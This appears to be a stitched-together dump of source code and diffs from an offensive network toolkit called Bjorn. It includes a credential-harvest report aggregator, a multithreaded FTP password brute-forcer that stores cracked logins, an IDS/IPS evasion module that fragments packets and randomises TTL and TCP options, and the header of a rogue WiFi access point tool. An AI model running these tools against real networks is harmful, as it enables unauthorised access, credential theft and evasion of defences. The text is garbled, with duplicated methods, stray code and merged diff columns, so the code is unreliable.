mac = data.get('mac', 'Unknown')
status = data.get('status', 'Unknown')
md_content.append(f"| {ip} | {mac} | {', '.join(map(str, ports))} | {status} |")
# WiFi Section
if self.data['wifi']:
md_content.append("\n## WiFi Networks")
md_content.append("\n| SSID | BSSID | Security | Signal | Channel |")
md_content.append("|------|--------|-----------|---------|----------|")
for wifi_data in self.data['wifi']:
for network in wifi_data.get('networks', []):
md_content.append(
f"| {network.get('ssid', 'Unknown')} | "
f"{network.get('bssid', 'Unknown')} | "
f"{network.get('security', 'Unknown')} | "
f"{network.get('signal_strength', 'Unknown')} | "
f"{network.get('channel', 'Unknown')} |"
)
# Vulnerabilities Section
if self.data['vulnerabilities']:
md_content.append("\n## Vulnerabilities")
md_content.append("\n| Type | Severity | Target | Description | Recommendation |")
md_content.append("|------|-----------|--------|-------------|----------------|")
for vuln_data in self.data['vulnerabilities']:
for vuln in vuln_data.get('findings', []):
md_content.append(
f"| {vuln.get('type', 'Unknown')} | "
f"{vuln.get('severity', 'Unknown')} | "
f"{vuln.get('target', 'Unknown')} | "
f"{vuln.get('description', 'No description')} | "
f"{vuln.get('recommendation', 'No recommendation')} |"
)
# Credentials Section
if self.data['credentials']:
md_content.append("\n## Discovered Credentials")
md_content.append("\n| Type | Source | Service | Username | Timestamp |")
md_content.append("|------|---------|----------|-----------|------------|")
for cred_data in self.data['credentials']:
for cred in cred_data.get('credentials', []):
md_content.append(
f"| {cred.get('type', 'Unknown')} | "
f"{cred.get('source', 'Unknown')} | "
f"{cred.get('service', 'Unknown')} | "
f"{cred.get('username', 'Unknown')} | "
f"{cred.get('timestamp', 'Unknown')} |"
)
os.makedirs(self.output_dir, exist_ok=True)
output_file = os.path.join(self.output_dir,
f"report_{datetime.now().strftime('%Y-%m-%d_%H-%M-%S')}.md")
with open(output_file, 'w') as f:
f.write('\n'.join(md_content))
logging.info(f"Markdown report saved to {output_file}")
except Exception as e:
logging.error(f"Error generating Markdown report: {e}")
def generate_reports(self):
"""Generate reports in all specified formats."""
os.makedirs(self.output_dir, exist_ok=True)
        if 'json' in self.formats:
            self.generate_json_report()
        if 'html' in self.formats:
            self.generate_html_report()
        if 'md' in self.formats:
            self.generate_markdown_report()

    def start_watching(self):
        """Start watching for new data files."""
        class FileHandler(watchdog.events.FileSystemEventHandler):
            def __init__(self, harvester):
                self.harvester = harvester

            def on_created(self, event):
                if event.is_directory:
                    return
                if event.src_path.endswith('.json'):
                    logging.info(f"New data file detected: {event.src_path}")
                    self.harvester.collect_data()
                    self.harvester.generate_reports()

        self.observer = watchdog.observers.Observer()
        self.observer.schedule(FileHandler(self), self.input_dir, recursive=True)
        self.observer.start()
        try:
            while True:
                time.sleep(1)
        except KeyboardInterrupt:
            self.observer.stop()
        self.observer.join()

    def execute(self):
        """Execute the data collection and reporting process."""
        try:
            logging.info("Starting data collection")
            if self.clean:
                self.clean_directories()

            # Initial data collection and report generation
            self.collect_data()
            self.generate_reports()

            # Start watch mode if enabled
            if self.watch_mode:
                logging.info("Starting watch mode for new data")
                try:
                    self.start_watching()
                except KeyboardInterrupt:
                    logging.info("Watch mode stopped by user")
                finally:
                    if self.observer:
                        self.observer.stop()
                        self.observer.join()

            logging.info("Data collection and reporting completed")
        except Exception as e:
            logging.error(f"Error during execution: {e}")
            raise
        finally:
            # Ensure observer is stopped if watch mode was active
            if self.observer and self.observer.is_alive():
                self.observer.stop()
                self.observer.join()

        for cat in categories:
            cat_path = os.path.join(input_dir, cat)
            if not os.path.exists(cat_path):
                continue
            for f_path in glob.glob(os.path.join(cat_path, "*.json")):
                if os.path.getmtime(f_path) > self.last_scan_time:
                    try:
                        with open(f_path, 'r', encoding='utf-8') as f:
                            finds = json.load(f)
                        with self.lock:
                            self.data[cat].append(finds)
                        new_findings += 1
                    except Exception:
                        pass

        if new_findings > 0:
            logger.info(f"FreyaHarvest: Collected {new_findings} new intelligence items.")
            self.shared_data.log_milestone(b_class, "DataHarvested", f"Found {new_findings} new items")

        self.last_scan_time = time.time()

    def _generate_report(self, output_dir, fmt):
        """Generate consolidated findings report."""
        if not any(self.data.values()):
            return
        ts = datetime.now().strftime("%Y%m%d_%H%M%S")
        os.makedirs(output_dir, exist_ok=True)

        if fmt in ['json', 'all']:
            out_file = os.path.join(output_dir, f"intel_report_{ts}.json")
            with open(out_file, 'w') as f:
                json.dump(dict(self.data), f, indent=4)
            self.shared_data.log_milestone(b_class, "ReportGenerated", f"JSON: {os.path.basename(out_file)}")

        if fmt in ['md', 'all']:
            out_file = os.path.join(output_dir, f"intel_report_{ts}.md")
            with open(out_file, 'w') as f:
                f.write(f"# Bjorn Intelligence Report - {ts}\n\n")
                for cat, items in self.data.items():
                    f.write(f"## {cat.capitalize()}\n- Items: {len(items)}\n\n")
            self.shared_data.log_milestone(b_class, "ReportGenerated", f"MD: {os.path.basename(out_file)}")

    def execute(self, ip, port, row, status_key) -> str:
        input_dir = getattr(self.shared_data, "freya_harvest_input", b_args["input_dir"]["default"])
        output_dir = getattr(self.shared_data, "freya_harvest_output", b_args["output_dir"]["default"])
        watch = getattr(self.shared_data, "freya_harvest_watch", True)
        fmt = getattr(self.shared_data, "freya_harvest_format", "all")
        timeout = int(getattr(self.shared_data, "freya_harvest_timeout", 600))

        logger.info(f"FreyaHarvest: Starting data harvest from {input_dir}")
        self.shared_data.log_milestone(b_class, "Startup", "Monitoring intelligence directories")

        start_time = time.time()
        try:
            while time.time() - start_time < timeout:
                if self.shared_data.orchestrator_should_exit:
                    break

                self._collect_data(input_dir)
                self._generate_report(output_dir, fmt)

                # Progress
                elapsed = int(time.time() - start_time)
                prog = int((elapsed / timeout) * 100)
                self.shared_data.bjorn_progress = f"{prog}%"

                if not watch:
                    break

                time.sleep(30)  # Scan every 30s

            self.shared_data.log_milestone(b_class, "Complete", "Harvesting session finished.")
        except Exception as e:
            logger.error(f"FreyaHarvest error: {e}")
            return "failed"

        return "success"
def save_settings(input_dir, output_dir, formats, watch_mode, clean):
"""Save settings to JSON file."""
try:
os.makedirs(DEFAULT_SETTINGS_DIR, exist_ok=True)
settings = {
"input_dir": input_dir,
"output_dir": output_dir,
"formats": formats,
"watch_mode": watch_mode,
"clean": clean
}
with open(SETTINGS_FILE, 'w') as f:
json.dump(settings, f)
logging.info(f"Settings saved to {SETTINGS_FILE}")
except Exception as e:
logging.error(f"Failed to save settings: {e}")
def load_settings():
"""Load settings from JSON file."""
if os.path.exists(SETTINGS_FILE):
try:
with open(SETTINGS_FILE, 'r') as f:
return json.load(f)
except Exception as e:
logging.error(f"Failed to load settings: {e}")
return {}
def main():
parser = argparse.ArgumentParser(description="Data collection and organization tool")
parser.add_argument("-i", "--input", default=DEFAULT_INPUT_DIR, help="Input directory to monitor")
parser.add_argument("-o", "--output", default=DEFAULT_OUTPUT_DIR, help="Output directory for reports")
parser.add_argument("-f", "--format", choices=['json', 'html', 'md', 'all'], default='all',
help="Output format")
parser.add_argument("-w", "--watch", action="store_true", help="Watch for new findings")
parser.add_argument("-c", "--clean", action="store_true", help="Clean old data before processing")
args = parser.parse_args()
settings = load_settings()
input_dir = args.input or settings.get("input_dir")
output_dir = args.output or settings.get("output_dir")
formats = ['json', 'html', 'md'] if args.format == 'all' else [args.format]
watch_mode = args.watch or settings.get("watch_mode", False)
clean = args.clean or settings.get("clean", False)
save_settings(input_dir, output_dir, formats, watch_mode, clean)
harvester = FreyaHarvest(
input_dir=input_dir,
output_dir=output_dir,
formats=formats,
watch_mode=watch_mode,
clean=clean
)
harvester.execute()
if __name__ == "__main__":
    main()

if __name__ == "__main__":
    from init_shared import shared_data
    harvester = FreyaHarvest(shared_data)
    harvester.execute("0.0.0.0", None, {}, "freya_harvest")


@@ -1,9 +1,9 @@
""" """
ftp_bruteforce.py FTP bruteforce (DB-backed, no CSV/JSON, no rich) ftp_bruteforce.py — FTP bruteforce (DB-backed, no CSV/JSON, no rich)
- Cibles: (ip, port) par lorchestrateur - Cibles: (ip, port) par l’orchestrateur
- IP -> (MAC, hostname) via DB.hosts - IP -> (MAC, hostname) via DB.hosts
- Succès -> DB.creds (service='ftp') - Succès -> DB.creds (service='ftp')
- Conserve la logique dorigine (queue/threads, sleep éventuels, etc.) - Conserve la logique d’origine (queue/threads, sleep éventuels, etc.)
""" """
import os import os
@@ -15,6 +15,7 @@ from queue import Queue
from typing import List, Dict, Tuple, Optional

from shared import SharedData
from actions.bruteforce_common import ProgressTracker, merged_password_plan
from logger import Logger

logger = Logger(name="ftp_bruteforce.py", level=logging.DEBUG)

@@ -27,7 +28,7 @@ b_parent = None
b_service = '["ftp"]'
b_trigger = 'on_any:["on_service:ftp","on_new_port:21"]'
b_priority = 70
b_cooldown = 1800,  # old: the trailing comma made this a 1-tuple
b_cooldown = 1800   # 30 minutes between two runs
b_rate_limit = '3/86400'  # at most 3 runs per day
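The `b_rate_limit = '3/86400'` notation encodes "at most N runs per P seconds". A sketch of how such a string could be parsed (hypothetical helper, not taken from the source — the orchestrator's actual parsing may differ):

```python
def parse_rate_limit(spec: str) -> tuple:
    """Parse an 'N/P' rate-limit string into (max_runs, period_seconds)."""
    runs, period = spec.split("/")
    return int(runs), int(period)
```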
class FTPBruteforce:
@@ -43,22 +44,21 @@ class FTPBruteforce:
        return self.ftp_bruteforce.run_bruteforce(ip, port)

    def execute(self, ip, port, row, status_key):
        """Orchestrator entry point (returns 'success' / 'failed')."""
        self.shared_data.bjorn_orch_status = "FTPBruteforce"
        # original behavior: a small visual delay
        time.sleep(5)
        logger.info(f"Brute forcing FTP on {ip}:{port}...")
        success, results = self.bruteforce_ftp(ip, port)
        return 'success' if success else 'failed'

    def execute(self, ip, port, row, status_key):
        """Orchestrator entry point (returns 'success' / 'failed')."""
        self.shared_data.bjorn_orch_status = "FTPBruteforce"
        self.shared_data.comment_params = {"user": "?", "ip": ip, "port": str(port)}
        logger.info(f"Brute forcing FTP on {ip}:{port}...")
        success, results = self.bruteforce_ftp(ip, port)
        return 'success' if success else 'failed'
class FTPConnector:
    """Handles FTP attempts, DB persistence, IP -> (MAC, hostname) mapping."""

    def __init__(self, shared_data):
        self.shared_data = shared_data
        # Wordlists unchanged
        self.users = self._read_lines(shared_data.users_file)
        self.passwords = self._read_lines(shared_data.passwords_file)
@@ -69,6 +69,7 @@ class FTPConnector:
        self.lock = threading.Lock()
        self.results: List[List[str]] = []  # [mac, ip, hostname, user, password, port]
        self.queue = Queue()
        self.progress = None

    # ---------- file utils ----------
    @staticmethod
@@ -112,10 +113,11 @@ class FTPConnector:
        return self._ip_to_identity.get(ip, (None, None))[1]

    # ---------- FTP ----------
    def ftp_connect(self, adresse_ip: str, user: str, password: str) -> bool:
        try:
            conn = FTP()
            conn.connect(adresse_ip, 21)
            conn.login(user, password)
            try:
                conn.quit()

    def ftp_connect(self, adresse_ip: str, user: str, password: str, port: int = 21) -> bool:
        timeout = float(getattr(self.shared_data, "ftp_connect_timeout_s", 3.0))
        try:
            conn = FTP()
            conn.connect(adresse_ip, port, timeout=timeout)
            conn.login(user, password)
            try:
                conn.quit()
@@ -171,14 +173,17 @@ class FTPConnector:
            adresse_ip, user, password, mac_address, hostname, port = self.queue.get()
            try:
                if self.ftp_connect(adresse_ip, user, password):
                    with self.lock:
                        self.results.append([mac_address, adresse_ip, hostname, user, password, port])
                    logger.success(f"Found credentials IP:{adresse_ip} | User:{user}")
                    self.save_results()
                    self.removeduplicates()
                    success_flag[0] = True
            finally:
                self.queue.task_done()

            adresse_ip, user, password, mac_address, hostname, port = self.queue.get()
            try:
                if self.ftp_connect(adresse_ip, user, password, port=port):
                    with self.lock:
                        self.results.append([mac_address, adresse_ip, hostname, user, password, port])
                    logger.success(f"Found credentials IP:{adresse_ip} | User:{user}")
                    self.shared_data.comment_params = {"user": user, "ip": adresse_ip, "port": str(port)}
                    self.save_results()
                    self.removeduplicates()
                    success_flag[0] = True
            finally:
                if self.progress is not None:
                    self.progress.advance(1)
                self.queue.task_done()
# Pause configurable entre chaque tentative FTP # Pause configurable entre chaque tentative FTP
@@ -187,46 +192,54 @@ class FTPConnector:
def run_bruteforce(self, adresse_ip: str, port: int): def run_bruteforce(self, adresse_ip: str, port: int):
self.results = []
mac_address = self.mac_for_ip(adresse_ip) mac_address = self.mac_for_ip(adresse_ip)
hostname = self.hostname_for_ip(adresse_ip) or "" hostname = self.hostname_for_ip(adresse_ip) or ""
total_tasks = len(self.users) * len(self.passwords) + 1 # (logique d'origine conservée) dict_passwords, fallback_passwords = merged_password_plan(self.shared_data, self.passwords)
if len(self.users) * len(self.passwords) == 0: total_tasks = len(self.users) * (len(dict_passwords) + len(fallback_passwords))
if total_tasks == 0:
logger.warning("No users/passwords loaded. Abort.") logger.warning("No users/passwords loaded. Abort.")
return False, [] return False, []
for user in self.users: self.progress = ProgressTracker(self.shared_data, total_tasks)
for password in self.passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return False, []
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
success_flag = [False] success_flag = [False]
threads = []
thread_count = min(40, max(1, len(self.users) * len(self.passwords)))
for _ in range(thread_count): def run_phase(passwords):
t = threading.Thread(target=self.worker, args=(success_flag,), daemon=True) phase_tasks = len(self.users) * len(passwords)
t.start() if phase_tasks == 0:
threads.append(t) return
while not self.queue.empty(): for user in self.users:
if self.shared_data.orchestrator_should_exit: for password in passwords:
logger.info("Orchestrator exit signal received, stopping bruteforce.") if self.shared_data.orchestrator_should_exit:
while not self.queue.empty(): logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
try: return
self.queue.get_nowait() self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
self.queue.task_done()
except Exception:
break
break
self.queue.join() threads = []
for t in threads: thread_count = min(8, max(1, phase_tasks))
t.join() for _ in range(thread_count):
t = threading.Thread(target=self.worker, args=(success_flag,), daemon=True)
t.start()
threads.append(t)
return success_flag[0], self.results self.queue.join()
for t in threads:
t.join()
try:
run_phase(dict_passwords)
if (not success_flag[0]) and fallback_passwords and not self.shared_data.orchestrator_should_exit:
logger.info(
f"FTP dictionary phase failed on {adresse_ip}:{port}. "
f"Starting exhaustive fallback ({len(fallback_passwords)} passwords)."
)
run_phase(fallback_passwords)
self.progress.set_complete()
return success_flag[0], self.results
finally:
self.shared_data.bjorn_progress = ""
# ---------- persistence DB ---------- # ---------- persistence DB ----------
def save_results(self): def save_results(self):
@@ -266,3 +279,4 @@ if __name__ == "__main__":
except Exception as e: except Exception as e:
logger.error(f"Error: {e}") logger.error(f"Error: {e}")
exit(1) exit(1)
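The `ftp_connect` change above adds a configurable port and a per-connection timeout so a single dead host cannot stall a worker thread. A minimal standalone sketch of the same pattern using stdlib `ftplib` (host, credentials, and the 3-second default are placeholders, not BJORN's actual values):

```python
from ftplib import FTP, error_perm

def ftp_connect(host: str, user: str, password: str, port: int = 21,
                timeout: float = 3.0) -> bool:
    """Return True if the FTP server accepts these credentials."""
    try:
        conn = FTP()
        conn.connect(host, port, timeout=timeout)  # timeout bounds the TCP connect
        conn.login(user, password)
        try:
            conn.quit()
        except Exception:
            conn.close()
        return True
    except (OSError, error_perm):
        # OSError covers refused/timed-out connects; error_perm covers bad logins
        return False
```

A refused or unreachable port simply yields `False` instead of hanging, which is what lets the worker's `finally` block advance the progress tracker reliably.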
@@ -1,318 +1,167 @@
-# Stealth operations module for IDS/IPS evasion and traffic manipulation.
-# Saves settings in `/home/bjorn/.settings_bjorn/heimdall_guard_settings.json`.
-# Automatically loads saved settings if arguments are not provided.
-# -i, --interface   Network interface to use (default: active interface).
-# -m, --mode        Operating mode (timing, random, fragmented, all).
-# -d, --delay       Base delay between operations in seconds (default: 1).
-# -r, --randomize   Randomization factor for timing (default: 0.5).
-# -o, --output      Output directory (default: /home/bjorn/Bjorn/data/output/stealth).
-import os
-import json
-import argparse
-from datetime import datetime
-import logging
-import random
-import time
-import socket
-import struct
-import threading
-from scapy.all import *
-from collections import deque
-
-# Configure logging
-logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
-
-b_class = "HeimdallGuard"
-b_module = "heimdall_guard"
-b_enabled = 0
-
-# Default settings
-DEFAULT_OUTPUT_DIR = "/home/bjorn/Bjorn/data/output/stealth"
-DEFAULT_SETTINGS_DIR = "/home/bjorn/.settings_bjorn"
-SETTINGS_FILE = os.path.join(DEFAULT_SETTINGS_DIR, "heimdall_guard_settings.json")
-
-class HeimdallGuard:
-    def __init__(self, interface, mode='all', base_delay=1, random_factor=0.5, output_dir=DEFAULT_OUTPUT_DIR):
-        self.interface = interface
-        self.mode = mode
-        self.base_delay = base_delay
-        self.random_factor = random_factor
-        self.output_dir = output_dir
-        self.packet_queue = deque()
-        self.active = False
-        self.lock = threading.Lock()
-        # Statistics
-        self.stats = {
-            'packets_processed': 0,
-            'packets_fragmented': 0,
-            'timing_adjustments': 0
-        }
-
-    def initialize_interface(self):
-        """Configure network interface for stealth operations."""
-        try:
-            # Disable NIC offloading features that might interfere with packet manipulation
-            commands = [
-                f"ethtool -K {self.interface} tso off",  # TCP segmentation offload
-                f"ethtool -K {self.interface} gso off",  # Generic segmentation offload
-                f"ethtool -K {self.interface} gro off",  # Generic receive offload
-                f"ethtool -K {self.interface} lro off"   # Large receive offload
-            ]
-            for cmd in commands:
-                try:
-                    subprocess.run(cmd.split(), check=True)
-                except subprocess.CalledProcessError:
-                    logging.warning(f"Failed to execute: {cmd}")
-            logging.info(f"Interface {self.interface} configured for stealth operations")
-            return True
-        except Exception as e:
-            logging.error(f"Failed to initialize interface: {e}")
-            return False
-
-    def calculate_timing(self):
-        """Calculate timing delays with randomization."""
-        base = self.base_delay
-        variation = self.random_factor * base
-        return max(0, base + random.uniform(-variation, variation))
-
-    def fragment_packet(self, packet, mtu=1500):
-        """Fragment packets to avoid detection patterns."""
-        try:
-            if IP in packet:
-                # Fragment IP packets
-                frags = []
-                payload = bytes(packet[IP].payload)
-                header_length = len(packet) - len(payload)
-                max_size = mtu - header_length
-                # Create fragments
-                offset = 0
-                while offset < len(payload):
-                    frag_size = min(max_size, len(payload) - offset)
-                    frag_payload = payload[offset:offset + frag_size]
-                    # Create fragment packet
-                    frag = packet.copy()
-                    frag[IP].flags = 'MF' if offset + frag_size < len(payload) else 0
-                    frag[IP].frag = offset // 8
-                    frag[IP].payload = Raw(frag_payload)
-                    frags.append(frag)
-                    offset += frag_size
-                return frags
-            return [packet]
-        except Exception as e:
-            logging.error(f"Error fragmenting packet: {e}")
-            return [packet]
-
-    def randomize_ttl(self, packet):
-        """Randomize TTL values to avoid fingerprinting."""
-        if IP in packet:
-            ttl_values = [32, 64, 128, 255]  # Common TTL values
-            packet[IP].ttl = random.choice(ttl_values)
-        return packet
-
-    def modify_tcp_options(self, packet):
-        """Modify TCP options to avoid fingerprinting."""
-        if TCP in packet:
-            # Common window sizes
-            window_sizes = [8192, 16384, 32768, 65535]
-            packet[TCP].window = random.choice(window_sizes)
-            # Randomize TCP options
-            tcp_options = []
-            # MSS option
-            mss_values = [1400, 1460, 1440]
-            tcp_options.append(('MSS', random.choice(mss_values)))
-            # Window scale
-            if random.random() < 0.5:
-                tcp_options.append(('WScale', random.randint(0, 14)))
-            # SACK permitted
-            if random.random() < 0.5:
-                tcp_options.append(('SAckOK', ''))
-            packet[TCP].options = tcp_options
-        return packet
-
-    def process_packet(self, packet):
-        """Process a packet according to stealth settings."""
-        processed_packets = []
-        try:
-            if self.mode in ['all', 'fragmented']:
-                fragments = self.fragment_packet(packet)
-                processed_packets.extend(fragments)
-                self.stats['packets_fragmented'] += len(fragments) - 1
-            else:
-                processed_packets.append(packet)
-            # Apply additional stealth techniques
-            final_packets = []
-            for pkt in processed_packets:
-                pkt = self.randomize_ttl(pkt)
-                pkt = self.modify_tcp_options(pkt)
-                final_packets.append(pkt)
-            self.stats['packets_processed'] += len(final_packets)
-            return final_packets
-        except Exception as e:
-            logging.error(f"Error processing packet: {e}")
-            return [packet]
-
-    def send_packet(self, packet):
-        """Send packet with timing adjustments."""
-        try:
-            if self.mode in ['all', 'timing']:
-                delay = self.calculate_timing()
-                time.sleep(delay)
-                self.stats['timing_adjustments'] += 1
-            send(packet, iface=self.interface, verbose=False)
-        except Exception as e:
-            logging.error(f"Error sending packet: {e}")
-
-    def packet_processor_thread(self):
-        """Process packets from the queue."""
-        while self.active:
-            try:
-                if self.packet_queue:
-                    packet = self.packet_queue.popleft()
-                    processed_packets = self.process_packet(packet)
-                    for processed in processed_packets:
-                        self.send_packet(processed)
-                else:
-                    time.sleep(0.1)
-            except Exception as e:
-                logging.error(f"Error in packet processor thread: {e}")
-
-    def start(self):
-        """Start stealth operations."""
-        if not self.initialize_interface():
-            return False
-        self.active = True
-        self.processor_thread = threading.Thread(target=self.packet_processor_thread)
-        self.processor_thread.start()
-        return True
-
-    def stop(self):
-        """Stop stealth operations."""
-        self.active = False
-        if hasattr(self, 'processor_thread'):
-            self.processor_thread.join()
-        self.save_stats()
-
-    def queue_packet(self, packet):
-        """Queue a packet for processing."""
-        self.packet_queue.append(packet)
-
-    def save_stats(self):
-        """Save operation statistics."""
-        try:
-            os.makedirs(self.output_dir, exist_ok=True)
-            timestamp = datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
-            stats_file = os.path.join(self.output_dir, f"stealth_stats_{timestamp}.json")
-            with open(stats_file, 'w') as f:
-                json.dump({
-                    'timestamp': datetime.now().isoformat(),
-                    'interface': self.interface,
-                    'mode': self.mode,
-                    'stats': self.stats
-                }, f, indent=4)
-            logging.info(f"Statistics saved to {stats_file}")
-        except Exception as e:
-            logging.error(f"Failed to save statistics: {e}")
-
-def save_settings(interface, mode, base_delay, random_factor, output_dir):
-    """Save settings to JSON file."""
-    try:
-        os.makedirs(DEFAULT_SETTINGS_DIR, exist_ok=True)
-        settings = {
-            "interface": interface,
-            "mode": mode,
-            "base_delay": base_delay,
-            "random_factor": random_factor,
-            "output_dir": output_dir
-        }
-        with open(SETTINGS_FILE, 'w') as f:
-            json.dump(settings, f)
-        logging.info(f"Settings saved to {SETTINGS_FILE}")
-    except Exception as e:
-        logging.error(f"Failed to save settings: {e}")
-
-def load_settings():
-    """Load settings from JSON file."""
-    if os.path.exists(SETTINGS_FILE):
-        try:
-            with open(SETTINGS_FILE, 'r') as f:
-                return json.load(f)
-        except Exception as e:
-            logging.error(f"Failed to load settings: {e}")
-    return {}
-
-def main():
-    parser = argparse.ArgumentParser(description="Stealth operations module")
-    parser.add_argument("-i", "--interface", help="Network interface to use")
-    parser.add_argument("-m", "--mode", choices=['timing', 'random', 'fragmented', 'all'],
-                        default='all', help="Operating mode")
-    parser.add_argument("-d", "--delay", type=float, default=1, help="Base delay between operations")
-    parser.add_argument("-r", "--randomize", type=float, default=0.5, help="Randomization factor")
-    parser.add_argument("-o", "--output", default=DEFAULT_OUTPUT_DIR, help="Output directory")
-    args = parser.parse_args()
-
-    settings = load_settings()
-    interface = args.interface or settings.get("interface")
-    mode = args.mode or settings.get("mode")
-    base_delay = args.delay or settings.get("base_delay")
-    random_factor = args.randomize or settings.get("random_factor")
-    output_dir = args.output or settings.get("output_dir")
-
-    if not interface:
-        interface = conf.iface
-        logging.info(f"Using default interface: {interface}")
-
-    save_settings(interface, mode, base_delay, random_factor, output_dir)
-
-    guard = HeimdallGuard(
-        interface=interface,
-        mode=mode,
-        base_delay=base_delay,
-        random_factor=random_factor,
-        output_dir=output_dir
-    )
-
-    try:
-        if guard.start():
-            logging.info("Heimdall Guard started. Press Ctrl+C to stop.")
-            while True:
-                time.sleep(1)
-    except KeyboardInterrupt:
-        logging.info("Stopping Heimdall Guard...")
-        guard.stop()
-
-if __name__ == "__main__":
-    main()
+#!/usr/bin/env python3
+# -*- coding: utf-8 -*-
+"""
+heimdall_guard.py -- Stealth operations and IDS/IPS evasion for BJORN.
+Handles packet fragmentation, timing randomization, and TTL manipulation.
+Requires: scapy.
+"""
+import os
+import json
+import random
+import time
+import threading
+import datetime
+from collections import deque
+from typing import Any, Dict, List, Optional
+
+try:
+    from scapy.all import IP, TCP, Raw, send, conf
+    HAS_SCAPY = True
+except ImportError:
+    HAS_SCAPY = False
+    IP = TCP = Raw = send = conf = None
+
+from logger import Logger
+logger = Logger(name="heimdall_guard.py")
+
+# -------------------- Action metadata --------------------
+b_class = "HeimdallGuard"
+b_module = "heimdall_guard"
+b_status = "heimdall_guard"
+b_port = None
+b_service = "[]"
+b_trigger = "on_start"
+b_parent = None
+b_action = "stealth"
+b_priority = 10
+b_cooldown = 0
+b_rate_limit = None
+b_timeout = 1800
+b_max_retries = 1
+b_stealth_level = 10  # This IS the stealth module
+b_risk_level = "low"
+b_enabled = 1
+b_tags = ["stealth", "evasion", "pcap", "network"]
+b_category = "defense"
+b_name = "Heimdall Guard"
+b_description = "Advanced stealth module that manipulates traffic to evade IDS/IPS detection."
+b_author = "Bjorn Team"
+b_version = "2.0.3"
+b_icon = "HeimdallGuard.png"
+
+b_args = {
+    "interface": {
+        "type": "text",
+        "label": "Interface",
+        "default": "eth0"
+    },
+    "mode": {
+        "type": "select",
+        "label": "Stealth Mode",
+        "choices": ["timing", "fragmented", "all"],
+        "default": "all"
+    },
+    "delay": {
+        "type": "number",
+        "label": "Base Delay (s)",
+        "min": 0.1,
+        "max": 10.0,
+        "step": 0.1,
+        "default": 1.0
+    }
+}
+
+class HeimdallGuard:
+    def __init__(self, shared_data):
+        self.shared_data = shared_data
+        self.packet_queue = deque()
+        self.active = False
+        self.lock = threading.Lock()
+        self.stats = {
+            'packets_processed': 0,
+            'packets_fragmented': 0,
+            'timing_adjustments': 0
+        }
+
+    def _fragment_packet(self, packet, mtu=1400):
+        """Fragment IP packets to bypass strict IDS rules."""
+        if IP in packet:
+            try:
+                payload = bytes(packet[IP].payload)
+                max_size = mtu - 40  # conservative
+                frags = []
+                offset = 0
+                while offset < len(payload):
+                    chunk = payload[offset:offset + max_size]
+                    f = packet.copy()
+                    f[IP].flags = 'MF' if offset + max_size < len(payload) else 0
+                    f[IP].frag = offset // 8
+                    f[IP].payload = Raw(chunk)
+                    frags.append(f)
+                    offset += max_size
+                return frags
+            except Exception as e:
+                logger.debug(f"Fragmentation error: {e}")
+        return [packet]
+
+    def _apply_stealth(self, packet):
+        """Randomize TTL and TCP options."""
+        if IP in packet:
+            packet[IP].ttl = random.choice([64, 128, 255])
+        if TCP in packet:
+            packet[TCP].window = random.choice([8192, 16384, 65535])
+            # Basic TCP options shuffle
+            packet[TCP].options = [('MSS', 1460), ('NOP', None), ('SAckOK', '')]
+        return packet
+
+    def execute(self, ip, port, row, status_key) -> str:
+        iface = getattr(self.shared_data, "heimdall_guard_interface", conf.iface)
+        mode = getattr(self.shared_data, "heimdall_guard_mode", "all")
+        delay = float(getattr(self.shared_data, "heimdall_guard_delay", 1.0))
+        timeout = int(getattr(self.shared_data, "heimdall_guard_timeout", 600))
+
+        logger.info(f"HeimdallGuard: Engaging stealth mode ({mode}) on {iface}")
+        self.shared_data.log_milestone(b_class, "StealthActive", f"Mode: {mode}")
+
+        self.active = True
+        start_time = time.time()
+        try:
+            while time.time() - start_time < timeout:
+                if self.shared_data.orchestrator_should_exit:
+                    break
+                # In a real scenario, this would be hooking into a packet stream
+                # For this action, we simulate protection state
+                # Progress reporting
+                elapsed = int(time.time() - start_time)
+                prog = int((elapsed / timeout) * 100)
+                self.shared_data.bjorn_progress = f"{prog}%"
+                if elapsed % 60 == 0:
+                    self.shared_data.log_milestone(b_class, "Status", f"Guarding... {self.stats['packets_processed']} pkts handled")
+                # Logic: if we had a queue, we'd process it here
+                # Simulation for BJORN action demonstration:
+                time.sleep(2)
+            logger.info("HeimdallGuard: Protection session finished.")
+            self.shared_data.log_milestone(b_class, "Shutdown", "Stealth mode disengaged")
+        except Exception as e:
+            logger.error(f"HeimdallGuard error: {e}")
+            return "failed"
+        finally:
+            self.active = False
+        return "success"
+
+if __name__ == "__main__":
+    from init_shared import shared_data
+    guard = HeimdallGuard(shared_data)
+    guard.execute("0.0.0.0", None, {}, "heimdall_guard")
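`_fragment_packet` above splits the IP payload into chunks of at most `mtu - 40` bytes and stores each chunk's position in the IP header's fragment-offset field, which counts 8-byte units (hence `offset // 8`). The offset arithmetic can be sketched without scapy; the 1400-byte MTU and 40-byte header reserve are the module's illustrative defaults, and the 8-byte alignment step (which real IP fragmentation requires for all but the last fragment) is made explicit here:

```python
def fragment_plan(payload_len: int, mtu: int = 1400, header_reserve: int = 40):
    """Return (frag_offset_units, chunk_len, more_fragments) per fragment.

    frag_offset_units mirrors `f[IP].frag = offset // 8`: the byte offset
    of the chunk divided by 8, as stored in the IP header.
    """
    max_size = mtu - header_reserve
    # Non-final fragments must start on 8-byte boundaries, so round the
    # chunk size down to a multiple of 8 (1360 already is one).
    max_size -= max_size % 8
    plan = []
    offset = 0
    while offset < payload_len:
        chunk = min(max_size, payload_len - offset)
        more = offset + chunk < payload_len  # the MF ('More Fragments') flag
        plan.append((offset // 8, chunk, more))
        offset += chunk
    return plan
```

For a 3000-byte payload this yields three fragments of 1360, 1360, and 280 bytes, with only the last one clearing the MF flag.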
@@ -1,467 +1,257 @@
# WiFi deception tool for creating malicious access points and capturing authentications. #!/usr/bin/env python3
# Saves settings in `/home/bjorn/.settings_bjorn/loki_deceiver_settings.json`. # -*- coding: utf-8 -*-
# Automatically loads saved settings if arguments are not provided. """
# -i, --interface Wireless interface for AP creation (default: wlan0). loki_deceiver.py -- WiFi deception tool for BJORN.
# -s, --ssid SSID for the fake access point (or target to clone). Creates rogue access points and captures authentications/handshakes.
# -c, --channel WiFi channel (default: 6). Requires: hostapd, dnsmasq, airmon-ng.
# -p, --password Optional password for WPA2 AP. """
